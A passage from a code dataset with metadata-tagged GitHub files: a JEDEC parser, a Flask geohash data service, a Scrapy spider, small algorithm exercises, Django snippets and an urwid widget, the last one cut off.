Dictionaries.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36621788342","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 18 15:02:57 2019\r\n\r\n@author: ybren\r\n\"\"\"\r\nimport os\r\nfrom const_machx02 import *\r\nimport ubinascii\r\nimport ustruct\r\n\r\nclass jedec(object):\r\n def __init__(self,fusetable):\r\n self.jed = fusetable\r\n self.cfg_data = []\r\n self.ebr_data = []\r\n self.ufm_data = []\r\n self.feature_row = None\r\n self.feature_bits = None\r\n self.last_note = \"\"\r\n self.data = []\r\n self._parse(self.jed)\r\n\r\n def compute_checksum(self,fusetable):\r\n crc = 0\r\n for i in range(len(fusetable)):\r\n crc += fusetable[i] << (i % 8)\r\n return crc\r\n\r\n # mutator\r\n def get_ebr_data(self):\r\n return self.ebr_data\r\n # mutator\r\n def get_ufm_data(self):\r\n return self.ufm_data\r\n # mutator\r\n def get_cfg_data(self):\r\n return self.cfg_data \r\n \r\n def shift_bits(self,line):\r\n retval = \"\"\r\n line_strip = line.strip()\r\n size_line = len(line_strip)\r\n for countbit_128 in range(size_line): \r\n valbit = line_strip[127-countbit_128]\r\n retval = retval + valbit\r\n return retval\r\n\r\n def endianness(self,line):\r\n packed_data = ubinascii.unhexlify(line)\r\n value = int.from_bytes(packed_data, 'little')\r\n fmt = hex(value) \r\n result = fmt[2:] # remove 0x\r\n return result.upper()\r\n \r\n # private method, to parse jed file\r\n def _parse(self,jed):\r\n \r\n def process_line(line,field):\r\n# data = []\r\n #print(field)\r\n if EOF in line:\r\n field = \"\" \r\n elif field == \"CONFIG DATA\":\r\n line_shift = self.shift_bits(line)\r\n #print(\"line\",line_shift) \r\n data = int(line_shift, 2)\r\n value = hex(data) \r\n #print(hex(data)) \r\n self.cfg_data.append(value) \r\n elif field == \"UFM_DATA\":\r\n line_shift = self.shift_bits(line) \r\n data = int(line_shift, 2)\r\n value = hex(data)\r\n self.ufm_data.append(value)\r\n elif \"L000000\" in line: \r\n field=\"CONFIG DATA\"\r\n #print(\"CONFIG DATA\")\r\n elif \"L\" in line:\r\n field=\"\" \r\n elif \"END CONFIG DATA\" in line: \r\n field=\"UFM_DATA\"\r\n elif \"TAG DATA\" in line: \r\n field=\"CONFIG DATA\"\r\n elif \"FEATURE_ROW\" in line: \r\n field=\"FEATURE_ROW\" \r\n return field\r\n num_row = 0 \r\n loop = True\r\n # lines = [i.strip() for i in jed] # remove char endline \\n\r\n # print(len(lines)) \r\n print(len(jed))\r\n print(jed[0]) \r\n line = \"\"\r\n field = \"\"\r\n while(loop):\r\n line = jed[num_row+1] \r\n if ETX in line:\r\n print(\"finishhhhhhhhhhhhhhhhhhhh\")\r\n loop = False\r\n field = process_line(line,field) \r\n num_row=num_row+1 \r\n","repo_name":"monk31/wifi_lattice","sub_path":"esp32_jtag/jedec.py","file_name":"jedec.py","file_ext":"py","file_size_in_byte":3365,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"39934055275","text":"import glob\nimport os.path\n\nfrom .case import Case\nfrom tools.functional import SingletonMeta\n\nPOJ_ROOT = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\n\n\nclass DataBase(object, metaclass=SingletonMeta):\n\n def __init__(self, resource_dir=None):\n self.res_dir = resource_dir if resource_dir is not None else os.path.join(POJ_ROOT, \"static\")\n\n self._case_dict = {}\n for case_path in glob.glob(os.path.join(self.res_dir, \"case\", \"*.json\")):\n case = Case.from_json(case_path)\n case_list = self._case_dict.get(case.prop.industry, [])\n case_list.append(case)\n self._case_dict[case.prop.industry] = case_list\n\n def get_all_case(self):\n all_case = []\n for case_list in self._case_dict.values():\n all_case += case_list\n return all_case\n\n def get_all_industry(self):\n return list(self._case_dict.keys())\n\n\ndb = DataBase()\n","repo_name":"EnZzzzzz/DashManagement","sub_path":"database/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44233328853","text":"\"\"\"Small web service providing geohash level data for the afscgap visualization.\n\n(c) 2023 Regents of University of California / The Eric and Wendy Schmidt Center\nfor Data Science and the Environment at UC Berkeley.\n\nThis file is part of afscgap released under the BSD 3-Clause License. See\nLICENSE.md.\n\"\"\"\nimport contextlib\nimport csv\nimport io\nimport json\nimport re\nimport sqlite3\nimport typing\n\nimport flask\n\nimport data_util\nimport model\nimport sql_util\nimport survey_util\n\n\nFILENAME_REGEX = re.compile('^[A-Za-z\\\\_0-9]+$')\n\nOUTPUT_COLS = [\n 'year',\n 'survey',\n 'species',\n 'commonName',\n 'geohash',\n 'surfaceTemperatureC',\n 'bottomTemperatureC',\n 'weightKg',\n 'count',\n 'areaSweptHectares',\n 'numRecordsAggregated',\n 'latLowDegrees',\n 'lngLowDegrees',\n 'latHighDegrees',\n 'lngHighDegrees'\n]\n\nOUTPUT_COLS_DELTA = [\n 'year',\n 'survey',\n 'species',\n 'commonName',\n 'geohash',\n 'surfaceTemperatureCDelta',\n 'bottomTemperatureCDelta',\n 'weightKgDelta',\n 'countDelta',\n 'areaSweptHectaresDelta',\n 'numRecordsAggregated',\n 'latLowDegrees',\n 'lngLowDegrees',\n 'latHighDegrees',\n 'lngHighDegrees'\n]\n\n\ndef sort_names_by_lower(target: typing.List[str]) -> typing.List[str]:\n \"\"\"Sort a set of strings ignoring case in ascending order.\n\n Args:\n target: The collection of strings to sort.\n\n Returns:\n A copy of target sorted.\n \"\"\"\n return sorted(target, key=lambda x: x.lower())\n\n\ndef get_display_info(connection: sqlite3.Connection,\n state: typing.Optional[typing.Dict] = None) -> dict:\n \"\"\"Get information required to render species selection controls.\n\n Args:\n connection: A DB API 2.0 compliant connection.\n state: The state (initial selection of dataset filter vaules) provided\n by the client for which supplemental information is required or None\n if the client did not provide an initial selection in which case\n a default will be provided.\n\n Returns:\n A state dictionary with supplemental information required for the UI.\n \"\"\"\n if state is None:\n state = {'state': [\n {\n 'selections': [\n {\n 'speciesType': 'common',\n 'scientificName': 'Gadus macrocephalus',\n 'commonName': 'Pacific cod',\n 'year': 2013\n },\n {\n 'speciesType': 'common',\n 'scientificName': 'None',\n 'commonName': 'None',\n 'year': 2013\n }\n ],\n 'area': 'GOA',\n 'temperature': 'disabled'\n },\n {\n \"selections\": [\n {\n 'speciesType': 'common',\n 'scientificName': 'Gadus macrocephalus',\n 'commonName': 'Pacific cod',\n 'year': 2021\n },\n {\n 'speciesType': 'common',\n 'scientificName': 'None',\n 'commonName': 'None',\n 'year': 2021\n }\n ],\n 'area': 'GOA',\n 'temperature': 'disabled'\n }\n ]}\n\n cached_results: typing.Dict[str, model.SurveyAvailability] = {}\n\n def get_cached(survey: str) -> model.SurveyAvailability:\n \"\"\"Get availability information for a survey.\n\n Get a survey value if it has already been requested or request it if it\n is not yet cached.\n\n Args:\n survey: The name of the survey for which availability information\n is required. Example is GOA.\n\n Returns:\n Information on data availability within a survey.\n \"\"\"\n if survey not in cached_results:\n cached_results[survey] = survey_util.get_survey_availability(\n survey,\n connection\n )\n\n return cached_results[survey]\n\n for record in state['state']:\n availability = get_cached(record['area'])\n species = sort_names_by_lower(availability.get_species())\n common_names = sort_names_by_lower(availability.get_common_names())\n years = availability.get_years()\n\n record['species'] = species\n record['commonNames'] = common_names\n record['years'] = years\n\n return state\n\n\ndef get_species_select_content(display: typing.Dict, index: int) -> str:\n \"\"\"Utility function to server-side render the UI for species selection.\n\n Utility function to server-side render the UI for species selection which\n is useful due to the number of database calls required to produce it.\n\n Args:\n display: Information about the display state for which the selection\n component is being rendered. See get_display_info.\n index: The index of the selection UI within the page for pre-populating\n the elements IDs.\n\n Returns:\n Rendered template as a string.\n \"\"\"\n return flask.render_template(\n 'species.html',\n display=display,\n display_index=index\n )\n\n\ndef transform_keys_for_delta(target: dict) -> dict:\n \"\"\"Prepare dicts for deltas.\n\n Convert keys for a CSV export to indicate that they are doing a delta\n between years.\n\n Args:\n target: The record whose keys should be transformed.\n Returns:\n The record with updated keys.\n \"\"\"\n ret_dict = {}\n\n for (before, after) in zip(OUTPUT_COLS, OUTPUT_COLS_DELTA):\n ret_dict[after] = target[before]\n\n return ret_dict\n\n\ndef build_app(app: flask.Flask, db_str: typing.Optional[str] = None,\n db_uri: typing.Optional[bool] = None,\n conn_generator_builder=None) -> flask.Flask:\n \"\"\"Register endpoints for the visualization application.\n\n Args:\n app: The application in which to register the endpoints.\n sqlite_str: Path to the sqlite database on which to make queries.\n sqlite_uri: Flag indicating if sqlite_str should be read as a URI.\n conn_generator_builder: Function which builds a function that takes\n no arguments. It must yield a DB API 2.0 compliant connection\n into a context that is \"released\" when the context ends. See\n make_sqlite_connection for an example. Some clients may choose\n to close connection on \"release\" while others may choose to use\n a connection pool depending on the underlying data store. If not\n provided or None, defaults to make_sqlite_connection.\n\n Returns:\n The same app after endpoint registration.\n \"\"\"\n if not db_str:\n db_str = 'geohashes.db'\n\n if not db_uri:\n db_uri = False\n\n @contextlib.contextmanager\n def make_sqlite_connection():\n \"\"\"Wrap a sqlite connection with close on leaving context.\n\n If client code did not provide a conn_generator_builder, this default\n opens a sqlite connection that is closed on context end.\n\n Yeilds:\n Connection which is closed on context end.\n \"\"\"\n connection = sqlite3.connect(db_str, uri=db_uri)\n try:\n yield connection\n finally:\n connection.close()\n\n if conn_generator_builder:\n conn_generator = conn_generator_builder()\n else:\n conn_generator = make_sqlite_connection\n\n @app.route('/')\n def render_page():\n \"\"\"Render the visualization tool.\n\n Returns:\n Rendered HTML template.\n \"\"\"\n state = flask.request.args.get('state', None)\n if state:\n state = json.loads(state)\n\n with conn_generator() as con:\n return flask.render_template(\n 'viz.html',\n displays=get_display_info(con, state)['state'],\n get_species_select_content=get_species_select_content\n )\n\n @app.route('/speciesSelector/.html')\n def render_species_selector(area: str):\n \"\"\"Server-side render the speices selector UI.\n\n Due to the large number of database calls involved, server-side render\n the species selection component for a display.\n\n Args:\n area: The name of the area (like GOA for Gulf of Alaska).\n\n Returns:\n Pre-rendered species selection selector UI.\n \"\"\"\n with conn_generator() as con:\n availability = survey_util.get_survey_availability(area, con)\n\n species = availability.get_species()\n common_names = availability.get_common_names()\n years = availability.get_years()\n\n if len(species) == 0 or len(common_names) == 0 or len(years) == 0:\n return 'Not found.', 404\n\n display = {\n \"selections\": [\n {\n 'speciesType': 'common',\n 'scientificName': flask.request.args.get(\"name1\", \"None\"),\n 'commonName': flask.request.args.get(\"name1\", \"None\"),\n 'year': int(flask.request.args.get(\"year1\", \"None\"))\n },\n {\n 'speciesType': 'common',\n 'scientificName': flask.request.args.get(\"name2\", \"None\"),\n 'commonName': flask.request.args.get(\"name2\", \"None\"),\n 'year': int(flask.request.args.get(\"year2\", \"None\"))\n }\n ],\n 'area': area,\n 'species': species,\n 'commonNames': common_names,\n 'years': years\n }\n\n display_index = int(flask.request.args.get('index', 0))\n\n return get_species_select_content(display, display_index)\n\n @app.route('/geohashes.csv')\n def download_geohashes():\n \"\"\"Download presence data for a species at the geohash level.\n\n Download presence data for a species at the geohash level where data are\n filtered according to get URL parameters survey and year as well as\n either species (scientific name) or common name (commonName arg).\n\n Returns:\n CSV file with the query results.\n \"\"\"\n is_comparison = flask.request.args.get('comparison', 'n') == 'y'\n\n survey = flask.request.args['survey']\n year = flask.request.args['year']\n\n species = flask.request.args.get('species', None)\n common_name = flask.request.args.get('commonName', None)\n geohash_size = int(flask.request.args.get('geohashSize', 4))\n\n filename_pieces: typing.List[str] = []\n filename_pieces.append(survey)\n\n if species is not None:\n species_filter = ('species', species)\n filename_pieces.append(species)\n elif common_name is not None:\n species_filter = ('common_name', common_name)\n filename_pieces.append(common_name)\n else:\n return 'Whoops! Please specify commonName or species.', 400\n\n filename_pieces.append(year)\n\n comparison_filename_pieces = []\n if is_comparison:\n other_year = flask.request.args['otherYear']\n other_species = flask.request.args.get('otherSpecies', None)\n other_common_name = flask.request.args.get('otherCommonName', None)\n\n if species is not None:\n other_species_filter = ('species', other_species)\n comparison_filename_pieces.append(other_species)\n elif common_name is not None:\n other_species_filter = ('common_name', other_common_name)\n comparison_filename_pieces.append(other_common_name)\n else:\n return 'Whoops! Please specify commonName or species.', 400\n\n comparison_filename_pieces.append(other_year)\n comparison_filename_pieces.append('minus')\n\n base_sql = sql_util.get_sql('delta')\n query_sql = base_sql % (\n geohash_size + 1,\n species_filter[0],\n geohash_size + 1,\n other_species_filter[0]\n )\n query_args = (\n year,\n survey,\n species_filter[1],\n other_year,\n survey,\n other_species_filter[1]\n )\n else:\n base_sql = sql_util.get_sql('query')\n query_sql = base_sql % (geohash_size + 1, species_filter[0])\n query_args = (year, survey, species_filter[1])\n\n output_io = io.StringIO()\n writer = csv.DictWriter(\n output_io,\n fieldnames=OUTPUT_COLS_DELTA if is_comparison else OUTPUT_COLS\n )\n writer.writeheader()\n\n with conn_generator() as connection:\n cursor = connection.cursor()\n cursor.execute(\n query_sql,\n query_args\n )\n results = cursor.fetchall()\n cursor.close()\n\n results_obj = map(data_util.parse_record, results)\n results_dict = map(data_util.record_to_dict, results_obj)\n\n if is_comparison:\n results_dict_final = map(transform_keys_for_delta, results_dict)\n else:\n results_dict_final = results_dict\n\n writer.writerows(results_dict_final)\n\n full_filename_pieces = comparison_filename_pieces + filename_pieces\n filename_spaces = '_'.join(full_filename_pieces)\n filename = filename_spaces.replace(' ', '_')\n\n if FILENAME_REGEX.match(filename) is None:\n filename = 'results'\n\n output = flask.make_response(output_io.getvalue())\n disposition = 'attachment; filename=%s.csv' % filename\n output.headers['Content-Disposition'] = disposition\n output.headers['Content-type'] = 'text/csv'\n\n return output\n\n @app.route('/example.py')\n def download_python_example():\n \"\"\"Generate a Python example.\n\n Geneate a Python example for requesting data currently displayed in the\n visualization.\n\n Returns:\n Python code file with 1 - 2 example queries against NOAA AFSC GAP.\n \"\"\"\n is_comparison = flask.request.args.get('comparison', 'n') == 'y'\n\n survey = flask.request.args['survey']\n year = flask.request.args['year']\n\n species = flask.request.args.get('species', None)\n common_name = flask.request.args.get('commonName', None)\n\n if is_comparison:\n other_year = flask.request.args['otherYear']\n other_species = flask.request.args.get('otherSpecies', None)\n other_common_name = flask.request.args.get('otherCommonName', None)\n else:\n other_year = None\n other_species = None\n other_common_name = None\n\n output = flask.make_response(flask.render_template(\n 'example.py_html',\n survey=survey,\n year=year,\n species=species,\n common_name=common_name,\n is_comparison=is_comparison,\n other_year=other_year,\n other_species=other_species,\n other_common_name=other_common_name\n ))\n output.headers['Content-Disposition'] = 'attachment; filename=query.py'\n output.headers['Content-type'] = 'text/python'\n\n return output\n\n @app.route('/summarize.json')\n def summarize():\n \"\"\"Provide summary statistics for a dataset.\n\n Summarize the minimum and maximum values in a data subset which is\n required to properly generate scales for the visualization. This is\n done server side in order to offload some computation to the database\n engine.\n\n Returns:\n JSON encoded document with min and max temperatures and catch per\n unit area.\n \"\"\"\n def try_int(target: str) -> int:\n try:\n return int(target)\n except ValueError:\n return 0\n\n def try_float(target: str) -> float:\n if target is None:\n return 0\n try:\n return float(target)\n except ValueError:\n return 0\n\n survey = flask.request.args['survey']\n year = try_int(flask.request.args['year'])\n temperature_mode = flask.request.args['temperature']\n\n species = flask.request.args.get('species', None)\n common_name = flask.request.args.get('commonName', None)\n geohash_size = int(flask.request.args.get('geohashSize', 4))\n\n if species is not None:\n species_filter = ('species', species)\n elif common_name is not None:\n species_filter = ('common_name', common_name)\n else:\n return 'Whoops! Please specify commonName or species.', 400\n\n if temperature_mode == 'surface':\n temperature_field = 'surface_temperature'\n else:\n temperature_field = 'bottom_temperature'\n\n is_comparison = flask.request.args.get('comparison', 'n') == 'y'\n if is_comparison:\n other_year = try_int(flask.request.args['otherYear'])\n other_species = flask.request.args.get('otherSpecies', None)\n other_common_name = flask.request.args.get('otherCommonName', None)\n\n if other_species is not None:\n other_species_filter = ('species', other_species)\n elif other_common_name is not None:\n other_species_filter = ('common_name', other_common_name)\n else:\n return 'Whoops! Please specify commonName or species.', 400\n\n base_sql = sql_util.get_sql('summarize_compare')\n query_sql = base_sql % (\n temperature_field,\n geohash_size + 1,\n species_filter[0],\n temperature_field,\n geohash_size + 1,\n other_species_filter[0]\n )\n query_args = (\n year,\n survey,\n species_filter[1],\n other_year,\n survey,\n other_species_filter[1]\n )\n else:\n base_sql = sql_util.get_sql('summarize')\n query_sql = base_sql % (\n temperature_field,\n species_filter[0],\n geohash_size + 1\n )\n query_args = (year, survey, species_filter[1])\n\n with conn_generator() as connection:\n cursor = connection.cursor()\n cursor.execute(\n query_sql,\n query_args\n )\n results = cursor.fetchall()\n cursor.close()\n\n result = results[0]\n\n if result[0] is None:\n min_cpue = 0\n max_cpue = 0\n min_temp = 0\n max_temp = 0\n first_cpue = 0\n second_cpue = 0\n else:\n result_float = [try_float(x) for x in result]\n\n (\n min_cpue,\n max_cpue,\n min_temp,\n max_temp,\n first_cpue,\n second_cpue\n ) = result_float\n\n ret_object = {\n 'cpue': {\n 'min': min_cpue,\n 'max': max_cpue,\n 'first': {\n 'name': species_filter[1],\n 'year': year,\n 'value': first_cpue\n }\n },\n 'temperature': {'min': min_temp, 'max': max_temp}\n }\n\n if is_comparison:\n ret_object['cpue']['second'] = {\n 'name': other_species_filter[1],\n 'year': other_year,\n 'value': second_cpue\n }\n\n return json.dumps(ret_object)\n\n return app\n\n\nif __name__ == '__main__':\n app = flask.Flask(__name__)\n build_app(app, 'geohashes.db', True)\n app.run(debug=True)\n","repo_name":"SchmidtDSE/afscgap","sub_path":"afscgapviz/afscgapviz.py","file_name":"afscgapviz.py","file_ext":"py","file_size_in_byte":20012,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"1681394385","text":"import scrapy\n\n\nclass NorgrenSpider(scrapy.Spider):\n name = 'norgren'\n start_urls = ['https://www.norgren.com/de/en/list']\n\n def start_requests(self):\n for start_url in self.start_urls:\n yield scrapy.Request(start_url, callback=self.parse)\n\n def parse(self, response):\n link_list = []\n\n more_info_items = response.css(\n \".match-height a.more-info::attr(href)\").getall()\n\n detail_items = [item for item in more_info_items if '/detail/' in item]\n if len(detail_items) > 0:\n print(f'This is a link you are searching for: {response.url}')\n\n for item in more_info_items:\n if not \"/detail/\" in item:\n inner_page_link = response.urljoin(item)\n link_list.append(inner_page_link)\n yield {\"target_url\": inner_page_link}\n\n for new_link in link_list:\n yield scrapy.Request(new_link, callback=self.parse)\n","repo_name":"LeonardoSirino/StackAnswers","sub_path":"Q014-failed-to-retrieve-product-listings-pages-from-few-categories/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71646747114","text":"\"\"\"\nYou are given the head of a linked list, which contains a series of integers separated by 0's.\nThe beginning and end of the linked list will have Node.val == 0.\n\nFor every two consecutive 0's, merge all the nodes lying in between them into a single node whose \nvalue is the sum of all the merged nodes. The modified list should not contain any 0's.\n\nReturn the head of the modified linked list.\n\nEXPLANATION:\n\nDummy head to take care of cases where no head is given and to make it easier to start the summing\nsince the first node is guaranteed to be 0\n\n\nWhen we hit a 0 value node, remember that node and sum up all the nodes that come after it up until the\nnext 0 value node, then change the nodes value we started at to the value of the sum and set its pointer to\npoint to the node we stopped at.\n\nRepeat until the node after the 0 is null.\n\"\"\"\n\nfrom typing import Optional\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\ndef mergeNodes(head: Optional[ListNode]) -> Optional[ListNode]:\n\n curr = dummy = ListNode(-1, next=head)\n\n while curr is not None:\n if curr.val != 0:\n curr = curr.next\n continue\n\n tmp = curr\n _sum = 0\n while curr.next.val != 0:\n curr = curr.next\n _sum += curr.val\n\n tmp.val = _sum\n curr = curr.next\n if curr.next is None:\n curr = tmp.next = None\n else:\n tmp.next = curr\n\n return dummy.next","repo_name":"kennyhml/leetcode","sub_path":"medium/2191_merge_nodes_between_zeros.py","file_name":"2191_merge_nodes_between_zeros.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"36158629519","text":"#!/usr/bin/env python3\n# _*_ coding: utf-8 _*_\nimport numpy as np\n\nA = np.array([\n [7, 1], \n [2, -3], \n [4, 8], \n ])\n \nB = np.array([\n [ 1, 6 ],\n [-2, 3 ],\n ])\n\nC = np.array([\n [4, 1],\n [7, 3],\n ])\n\n# Associative\nABC = A.dot(B.dot(C))\nAB_C = A.dot(B).dot(C)\n\n\n# Distributive\nD = A.dot(B + C)\nE = A.dot(B) + A.dot(C)\n\n# Commutative\nprint('\\n', B.dot(C))\nprint('\\n', C.dot(B))\nprint('\\n', B.dot(C) == C.dot(B))\n\nv1 = np.array([[3],\n [8],\n [1],\n ])\n\nv2 = np.array([[4],\n [8],\n [3],\n ])\n\nprint('\\n', v1.T.dot(v2))\nprint('\\n', v2.T.dot(v1))","repo_name":"rafaeltorrese/slides_linear-algebra-intro","sub_path":"scriptsLinAlg/06_matrix-properties.py","file_name":"06_matrix-properties.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17231106352","text":"# -*- coding:utf-8 -*-\n\nimport os, sys\nfrom typing import Dict, List\n\ndef perm(items: List[int], n: int):\n ''' 实现列表排列: 原地递归, 返回迭代器\n '''\n if n <= 0:\n n = len(items)\n for i in range(len(items)):\n v = items[i:i+1]\n if n == 1:\n yield v # v is []\n else:\n rest = items[:i] + items[i+1:] # rest always has n-1 elements\n for p in perm(rest, n-1):\n yield v + p\n\ndef comb(items: List[int], n: int):\n ''' 实现列表组合: 原地递归, 返回迭代器\n '''\n if n <= 0:\n n = len(items)\n for i in range(len(items)):\n v = items[i:i+1]\n if n == 1:\n yield v # v is []\n else:\n rest = items[i+1:]\n for c in comb(rest, n-1):\n yield v + c\n\n\nif __name__ == '__main__':\n n, m = 4, 3\n items = list(range(0,n))\n\n # test case 1: permutation\n res = perm(items, m)\n print('--------permutation of P({},{}) is:'.format(n, m))\n for p in res:\n print(p)\n\n # test case 2: combination\n res = comb(items, m)\n print('--------combination of C({},{}) is:'.format(n, m))\n for c in res:\n print(c)\n","repo_name":"teaspring/problems","sub_path":"leetcode/py/perm.py","file_name":"perm.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"20252890769","text":"import os\nimport re\nfrom pathlib import Path\n\nimport ffmpeg\nfrom tqdm import tqdm\n\nCHUNK_SIZE = 3500\n\n\ndef convert_movies_to_images(\n dirname: str, data_key: str, full_run: bool = False, verbose: bool = False\n):\n \"\"\"\n Converts MP4 videos from the dataset directory to JPG images.\n :param dirname: Path to the dataset root directory\n :param data_key: key, which identifies the data group (e.g. s4-d1)\n :param full_run: (bool, optional, default=False) whether the conversion should be run in full, without skipping already converted folders.\n :param verbose: (bool, optional, default=False) whether detailed logs should be printed.\n :return: None\n \"\"\"\n movie_dir = dirname + f\"{data_key}/movies/\"\n\n movie_rgx = re.compile(f\"{data_key}-camera(.)-(.*).mp4\")\n\n movie_files = os.listdir(movie_dir)\n for movie_file in tqdm(movie_files, desc=\"Converting MP4 to JPG\"):\n match = re.search(movie_rgx, movie_file)\n camera_id = match.group(1)\n chunk = match.group(2)\n\n output_image_dir = Path(\n dirname + f\"{data_key}/images/{data_key}-camera{camera_id}-{chunk}\"\n )\n\n output_image_dir.mkdir(parents=True, exist_ok=True)\n\n # Check whether the conversion of movie was complete. If yes skip conversion.\n existing_images = os.listdir(output_image_dir)\n if len(existing_images) == CHUNK_SIZE and not full_run:\n continue\n\n full_movie_path = movie_dir + movie_file\n stream = ffmpeg.input(full_movie_path)\n stream = ffmpeg.output(\n stream,\n dirname\n + f\"{data_key}/images/{data_key}-camera{camera_id}-{chunk}/{data_key}-camera{camera_id}-%05d.jpg\",\n format=\"image2\",\n vcodec=\"mjpeg\",\n )\n stream.run(quiet=verbose)\n\n print(f\"Images have been saved to: {dirname}/{data_key}/images/\")\n","repo_name":"sinzlab/propose","sub_path":"propose/preprocessing/rat7m/format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"29670500068","text":"from django import template\n\n# 引用template.Library库\nregister = template.Library()\n\n\n# 处理变量的函数\ndef warning(value):\n ''' 将第一个字符变红 '''\n if value:\n return '' + value[0] + '' + value[1:]\n return value\n\n\n# 用逗号分隔数据\ndef account_sum(value, place=2):\n '''用逗号分隔数据'''\n try:\n place = int(place)\n except:\n place = 2\n\n try:\n from decimal import Decimal\n value = Decimal(value)\n import locale\n locale.setlocale(locale.LC_ALL, '')\n return locale.format(\"%.*f\", (place, value), 1)\n except Exception as err:\n return value\n\n\n\n# 注册过滤器\nregister.filter('warning', warning)\nregister.filter('account_sum', account_sum)","repo_name":"zhanghui0228/study","sub_path":"WebSite/Django/my_study/accounts/templatetags/accounts_extras.py","file_name":"accounts_extras.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15189829259","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Feb 10 10:05:08 2019\r\n\r\n@author: shinjisu\r\n\"\"\"\r\n\r\n\r\n# ARC 076 C\r\ndef getInt(): return int(input())\r\n\r\n\r\ndef getIntList(): return [int(x) for x in input().split()]\r\n\r\n\r\ndef zeros(n): return [0]*n\r\n\r\n\r\ndef dmp(x):\r\n global debug\r\n if debug:\r\n print(x)\r\n return x\r\n\r\n\r\ndef probC():\r\n N = getInt()\r\n A = getIntList()\r\n dmp((N, A))\r\n maxA = max(A)\r\n dmp(maxA)\r\n b = zeros(maxA+3)\r\n for i in range(N):\r\n b[A[i]] += 1\r\n b[A[i]+1] += 1\r\n b[A[i]+2] += 1\r\n dmp(b)\r\n return dmp(max(b))\r\n\r\n\r\ndebug = False # True False\r\nprint(probC())\r\n\r\ndef probCTLE2():\r\n N = getInt()\r\n A = getIntList()\r\n dmp((N, A))\r\n hist = zeros(10**5)\r\n for i in range(N):\r\n if A[i] in hist:\r\n hist[A[i]] += 1\r\n else:\r\n hist[A[i]] = 1\r\n #dmp(hist)\r\n mxCnt = 1\r\n #keylist = list(hist.keys())\r\n #mxKey = max(keylist)\r\n # dmp(mxKey)\r\n for k in range(10**5-2):\r\n cnt = hist[k] + hist[k+1] + hist[k+2]\r\n mxCnt = max(mxCnt, cnt)\r\n return mxCnt\r\n\r\n\r\ndef probCTLE():\r\n N = getInt()\r\n A = getIntList()\r\n dmp((N, A))\r\n hist = {}\r\n for i in range(N):\r\n if A[i] in hist:\r\n hist[A[i]] += 1\r\n else:\r\n hist[A[i]] = 1\r\n dmp(hist)\r\n mxCnt = 1\r\n keylist = list(hist.keys())\r\n mxKey = max(keylist)\r\n dmp(mxKey)\r\n for k in hist.keys():\r\n cnt = 0\r\n if k-1 in keylist:\r\n cnt += hist[k-1]\r\n if k in keylist:\r\n cnt += hist[k]\r\n if k+1 in keylist:\r\n cnt += hist[k+1]\r\n mxCnt = max(mxCnt, cnt)\r\n dmp(('max',mxCnt))\r\n return mxCnt\r\n\r\n\r\ndef probCWA():\r\n N = getInt()\r\n A = getIntList()\r\n dmp((N, A))\r\n hist = {}\r\n for i in range(N):\r\n if A[i] in hist:\r\n hist[A[i]] += 1\r\n else:\r\n hist[A[i]] = 1\r\n dmp(hist)\r\n mxCnt = 1\r\n keylist = list(hist.keys())\r\n mxKey = max(keylist)\r\n dmp(mxKey)\r\n for i in range(mxKey-1):\r\n cnt = 0\r\n if i in keylist:\r\n cnt += hist[i]\r\n if i+1 in keylist:\r\n cnt += hist[i+1]\r\n if i+2 in keylist:\r\n cnt += hist[i+2]\r\n mxCnt = max(mxCnt, cnt)\r\n dmp(('max',mxCnt))\r\n return mxCnt","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc082/A/4273029.py","file_name":"4273029.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"5838534016","text":"from django.urls import path\n\nfrom . import views \n#variavel para conseguir referenciar as urls do arquivo\napp_name = \"blog\"\n#lista de padroes de url \nurlpatterns =[\n #quando passar urls sem passar argumentos cairemos na lista de posts\n path(\"\", views.PostListView.as_view(), name=\"list\"),\n #quando acessarmos uma url passando o slug de um post como argumento ai acessamos a pagina desse post\n path(\"/\", views.PostDetailView.as_view(), name=\"detail\"),\n]","repo_name":"gabriellucas11/blog","sub_path":"tutorialdjango/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19009637324","text":"import urwid\nfrom datetime import date, datetime\n\nfrom ui.task_list import TaskRow\n\nclass TaskDetails(object):\n def __init__(self, task, stories, on_subtask_click, on_project_click,\n on_comment, on_assignee_click, on_due_date_click):\n self.task = task\n self.on_subtask_click = on_subtask_click,\n self.on_project_click = on_project_click,\n self.on_comment = on_comment\n\n body = [\n urwid.Text(('task', task.name())),\n urwid.Divider('⎼'),\n Memberships(task, on_subtask_click, on_project_click).component(),\n urwid.Divider('⎼'),\n Assignee(task, on_assignee_click).component(),\n DueDate(task, on_due_date_click).component(),\n 